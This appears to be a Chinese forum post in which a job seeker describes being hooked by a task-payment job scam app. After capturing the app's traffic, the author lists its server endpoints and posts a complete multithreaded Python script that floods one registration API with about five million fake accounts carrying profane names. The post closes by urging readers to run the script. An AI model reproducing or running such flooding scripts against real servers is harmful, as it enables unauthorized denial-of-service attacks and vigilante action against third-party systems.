|
本帖最后由 XSProMax 于 2024-10-22 12:26 编辑
大概就是 很久之前投的简历
20241021使用165XXXXXXXX发送短信确认我的邮箱 回复了之后就是邮件沟通 对方是 163 我是139 然后 发了公司的简介 和子公司就是我投递简历的公司 然后看了待遇还可以 就一直邮件沟通 最后说让我下载一个挂着企业微信的图标 叫企业办公助手 的APP ios没有商家 授权是一个山东的企业 User-Agent: qi ye ban gong zhu shou/1.2.4 (iPhone; iOS 15.7.6; Scale/3.00)
然后就在这上面每隔10分钟做一下任务 然后 结账 152元
20241022 早上9点开始 做了30分钟的任务开始让交钱做其他的任务 我表示没钱 说我30多岁的人 几百块也没有 然后就把我t了 哭哭惹
抓包看了一下 应该是网易的 一个开源软件有这个网址的流量 lbs.netease.im
http://85371.yyddh002.xyz:30432/api
http://2o74hr793yjpg.10-21.ccict3.bond:30432/api
http://m28ndomz15x1vgc.yyddh005.xyz:30432/api
http://s9jlymea1.10-21.ccict3.shop:30432/api
http://jy3m5.yyddh005.cc:30432/api
这个就是注册账户的一些请求 写了个脚本放在 marscode里面跑
[ol]import requestsimport threadingimport randomimport time# 定义请求头headers = { 'Accept': '/', 'Accept-Encoding': 'gzip, deflate', 'Accept-Language': 'zh-Hans-US;q=1, en-US;q=0.9', 'Connection': 'keep-alive', 'Content-Type': 'application/x-www-form-urlencoded', 'Proxy-Connection': 'Keep-Alive', 'User-Agent': 'qi ye ban gong zhu shou/1.2.4 (iPhone; iOS 15.7.6; Scale/3.00)'}# 定义请求URLurl = 'http://s9jlymea1.10-21.ccict3.shop:30432/api/user/register'def generate_account_and_password(): account = 'cnm' + str(random.randint(0, 9999999)).zfill(7) password = 'cnm' + str(random.randint(0, 9999999)).zfill(7) while password == account: password = 'cnm' + str(random.randint(0, 9999999)).zfill(10) return account, passworddef register_user(account_password_pairs, file): for account, password in account_password_pairs: current_timestamp = int(time.time()) # 获取当前时间的时间戳 data = { 'account': account, 'deviceNo': 'BAGAYALUCAONIMACHOUPIANZI', 'ip': '127.0.0.1', 'nickname': '操NI妈', 'os': 'iOS', 'password': password, 'repassword': password, 'timestamp': current_timestamp, 'token': 'caonima-caonima-caonima-caonima' } response = requests.post(url, headers=headers, data=data) result = f'Account: {account}, Password: {password}, Response: {response.text}' file.write(result)# 创建并启动80个线程num_threads = 80threads = []accounts_per_thread = 5000000 // num_threadswith open('registration_results.txt', 'a+') as file: for _ in range(num_threads): account_password_pairs = [] for _ in range(accounts_per_thread): account, password = generate_account_and_password() account_password_pairs.append((account, password)) thread = threading.Thread(target=register_user, args=(account_password_pairs, file)) threads.append(thread) thread.start() # 等待所有线程完成 for thread in threads: thread.join()[/ol]复制代码
麻烦各位的机器开始跑起来!!!!! |
|